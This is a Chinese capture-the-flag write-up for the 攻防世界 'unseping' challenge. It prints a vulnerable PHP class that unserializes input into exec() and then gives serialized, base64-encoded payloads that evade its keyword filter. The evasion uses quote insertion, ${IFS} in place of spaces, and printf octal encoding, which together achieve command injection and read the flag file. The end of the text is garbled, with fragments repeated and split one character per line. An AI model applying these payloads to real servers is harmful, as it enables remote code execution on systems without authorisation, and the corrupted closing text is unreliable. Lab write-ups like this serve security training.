攻防世界37-unseping-CTFWeb
<?php
highlight_file(__FILE__);
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
function __destruct(){
if (in_array($this->method, array("ping"))) {
call_user_func_array(array($this, $this->method), $this->args);
}
}
function ping($ip){
exec($ip, $result);
var_dump($result);
}
function waf($str){
if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
return $str;
} else {
echo "don't hack";
}
}
function __wakeup(){
foreach($this->args as $k => $v) {
$this->args[$k] = $this->waf($v);
}
}
}
$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>
if (!preg_match_all(“/(||&|;| |/|cat|flag|tac|php|ls)/”, $str, $pat_array))做了过滤
且if (in_array($this->method, array(“ping”))),ping必须是method
这是一个反序列化问题
随便试一试,得到输出
<?php
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
}
$o=new ease("ping",array("ifconfig"));
$s = serialize($o);
echo base64_encode($s);
?>
ls被过滤了,有几种绕过方法
- 单引号,有效
- 双引号,有效
- I F S , {IFS}, IFS,{Z}有效
- l\s也行
空格被过滤了
<?php
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
}
$o=new ease("ping",array('l""s${IFS}f""lag_1s_here'));
$s = serialize($o);
echo base64_encode($s);
?>
/\都被过滤了
使用8进制编码"/",“/“的八进制编码为\57,使用 ( p r i n t f (printf (printf{IFS}”\57”)内敛执行输出“/”到字符串中
<?php
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
}
$o = new ease('ping', array('more${IFS}fl""ag_1s_here$(printf${IFS}"\57")f\lag_831b69012c67b35f.p\hp'));
//$o = new ease('ping', array('c""at${IFS}fl""ag_1s_here$(printf${IFS}"\57")f""lag_831b69012c67b35f.p""hp'));
//
$s = serialize($o);
echo base64_encode($s);
?>
得cyberpeace{305550cf468dbcfe0d6f5f0356c42ab4}
然后手动加斜杠也行
<?php
class ease{
private $method;
private $args;
function __construct($method, $args) {
$this->method = $method;
$this->args = $args;
}
}
$o=new ease("ping",array('$(printf${IFS}"\143\141\164\40\146\154\141\147\137\61\163\137\150\145\162\145\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
$s = serialize($o);
echo base64_encode($s);
?>
\57\146\154\141\147\137\70\63\61\142\66\71\60\61\62\143\66\67\142\63\65\146\56\160\150\160")'));
s
=
s
e
r
i
a
l
i
z
e
(
s = serialize(
s=serialize(o);
echo base64_encode($s);
?>
